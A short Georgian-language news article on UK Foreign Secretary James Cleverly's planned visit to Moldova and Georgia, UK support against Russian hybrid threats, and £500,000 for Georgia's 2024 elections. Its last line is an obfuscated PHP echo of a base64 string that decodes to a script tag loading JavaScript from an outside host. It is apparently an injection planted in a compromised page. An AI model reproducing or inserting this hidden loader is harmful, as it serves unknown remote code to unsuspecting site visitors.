celsiusi
ავერსი საქკაბელი
ბრიტანეთის მთავრობის ცნობით, ბრიტანეთის საგარეო საქმეთა მინისტრი დაადასტურებს, რომ გაერთიანებული სამეფო დგას მოლდოვისა და საქართველოს ხალხის გვერდით და იცავს მათ დემოკრატიულ არჩევანს თავისუფლების, დამოუკიდებლობისა და სუვერენიტეტის გზაზე.
„ცოტა ქვეყანას ესმის უკეთესად რუსეთის მავნე მოქმედების ფარული ტაქტიკა, ვიდრე მოლდოვასა და საქართველოს. გაერთიანებული სამეფო განზე არ გადგება, ვიდრე მოსკოვი აშკარად ძირს უთხრის მათ დემოკრატიას, სუვერენიტეტსა და ტერიტორიულ მთლიანობას. ჩვენ უნდა გავაძლიეროთ მათი გამძლეობა რუსეთის ჰიბრიდული საფრთხეების მიმართ, დავიცვათ მათი ხალხის დემოკრატიული არჩევანი და დავიცვათ ისინი მათ კარის ზღურბლზე არსებული საფრთხისგან“, – განაცხადა ჯეიმს კლევერლიმ ვიზიტის დაწყებამდე.
ბრიტანეთის მთავრობის ინფორმაციით, ორივე ქვეყანა დაუცველია, რადგან ისინი განიცდიან კრემლის ჰიბრიდული ტაქტიკის, აგრესიის და რეგიონზე რუსეთის კონტროლის გაფართოების მცდელობებს, რის გამოც საგარეო საქმეთა მინისტრი დაადასტურებს დიდი ბრიტანეთის ურყევ ერთგულებას მათი ტერიტორიული მთლიანობისა და სუვერენიტეტის დასაცავად.
ბრიტანეთის მთავრობის განცხადებაში აღნიშნულია, რომ საქართველოში ჯეიმს კლევერლი ნახავს, როგორ ეხმარება გაერთიანებული სამეფოს თანამშრომლობა რუსეთის დივერსიული ჩარევის წინააღმდეგ მოქმედებას, მათ შორის თავდაცვისა და კიბერუსაფრთხოების საკითხებში თანამშრომლობას. საქართველოში დემოკრატიის განმტკიცების მიზნით, დიდი ბრიტანეთი ასევე გამოყოფს 500 000 ფუნტს, რომელიც მიზნად ისახავს 2024 წელს თავისუფალი და სამართლიანი არჩევნებისთვის გარემოს შექმნას და მათ დაცვას გარე ჩარევისგან.
გაერთიანებული სამეფოს საგარეო, თანამეგობრობისა და განვითარების საქმეთა სახელმწიფო მდივანი ჯეიმს კლევერლი საქართველოს ოფიციალური ვიზიტით 16-17 მარტს ეწვევა.
335
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");